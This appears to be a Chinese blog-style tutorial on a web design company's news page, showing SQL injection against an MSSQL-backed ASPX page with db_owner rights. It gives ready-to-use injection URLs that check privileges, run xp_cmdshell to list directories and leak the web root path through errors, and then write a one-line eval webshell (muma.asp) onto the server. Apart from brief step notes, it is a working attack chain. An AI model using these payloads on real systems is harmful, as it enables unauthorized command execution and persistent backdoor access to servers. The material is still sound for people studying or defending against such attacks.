尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

mssql db_owner权限sql注入

mssql db_owner权限sql注入
📅 发布时间:2026/6/19 22:25:16
第一步 查看当前网站是否为db_owner 权限
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select is_member('db_owner') );-- 
判断当前数据库用户是否为db_owner 权限  没报错 有权限

第二步 执行一些报错语句 找路径
如果testdb库中有black表 就先删除 看下效果
http://192.168.152.129:85/1.aspx?xxser=1;drop table balck再创建
http://192.168.152.129:85/1.aspx?xxser=1;create TABLE black(result varchar(7996) NULL, ID int NOT NULL IDENTITY(1,1))通过xp_cmdshell扩展存储搜索出当前页面路径并插入到创建的表中
http://192.168.152.129:85/1.aspx?xxser=1;INSERT INTO black (result)
EXEC master..xp_cmdshell 'dir /s c:\1.aspx';然后在通过错误语句爆出插入到字段的路径
http://192.168.152.129:85/1.aspx?xxser=1 and (select result from black where id=9 )>0路径c:\www\凡诺网站搭建\wwwtest\iis-xxser.com--wwwroot\sqlserver 

特别注意 这个地方 往表插入数据时 有多行 id 值要多尝试 找到路径对应的值

p

第三步 写木马
http://192.168.152.129:85/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20 c:\www\凡诺网站搭建\wwwtest\iis-xxser.com--wwwroot\sqlserver\muma.asp'

相关新闻

  • 关于AI上下文工程重塑人机协作的 5 个颠覆性认知
  • java基础-12 : 单列集合(Collection) - 详解
  • 任务栏图标变空白

最新新闻

  • WechatBakTool:如何安全备份微信聊天记录的技术实现解析
  • 5分钟掌握B站智能评论分析:成分检测器完整指南
  • 2026深圳宝安搬家公司臻选:居民/企业/专业搬迁全场景优质搬迁服务商榜单 - 从来都是英雄出少年
  • MC9S12XE PWM引擎深度解析:从时钟架构到紧急关断安全设计
  • A卡炼丹环境搭建避坑指南:从RX 6700 XT驱动到PyTorch实战部署
  • AI为何像差生:从学习机制看模型泛化失效

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号